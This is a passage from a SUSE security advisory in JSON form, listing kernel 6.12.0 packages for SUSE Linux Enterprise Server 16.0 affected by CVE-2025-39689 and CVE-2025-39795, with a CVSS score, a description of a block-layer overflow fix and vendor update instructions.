"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: avoid possible overflow for chunk_sectors check in blk_stack_limits()\n\nIn blk_stack_limits(), we check that the t-\u003echunk_sectors value is a\nmultiple of the t-\u003ephysical_block_size value.\n\nHowever, by finding the chunk_sectors value in bytes, we may overflow\nthe unsigned int which holds chunk_sectors, so change the check to be\nbased on sectors.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39795",
"url": "https://www.suse.com/security/cve/CVE-2025-39795"
},
{
"category": "external",
"summary": "SUSE Bug 1249609 for CVE-2025-39795",
"url": "https://bugzilla.suse.com/1249609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
